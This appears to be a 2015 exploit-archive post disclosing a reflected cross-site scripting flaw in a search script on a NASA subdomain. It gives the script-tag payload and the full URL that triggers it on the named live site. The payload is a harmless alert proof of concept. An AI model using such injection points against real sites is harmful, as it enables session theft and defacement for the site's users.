NASA Cross Site Scripting
Posted on 30 December 2015
# Exploit Title : NASA Subdomain XSS Vulnerability # Exploit Author : 4TT4CK3R # Date : 2015/12/27 # Tested on : Kali linux , Windows 8.1 # Vendor HomePage : https://ghrc.nsstc.nasa.gov/ # Google Dork : No # Category : Web Application ~ # : Vulnerable Location :https://ghrc.nsstc.nasa.gov/hydro/search.pl ~ # : Using this script for XSS Vunerability Testing : <script>alert('4TT4CK3R')</script> ~ # : Our Finally address is :https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E # Discovered by : 4TT4CK3R # Hacker is not who deface a website with GoogleDork Which it shared with another person :) # I know nothing, It's too soon to say "I KNOW" # Cyber Police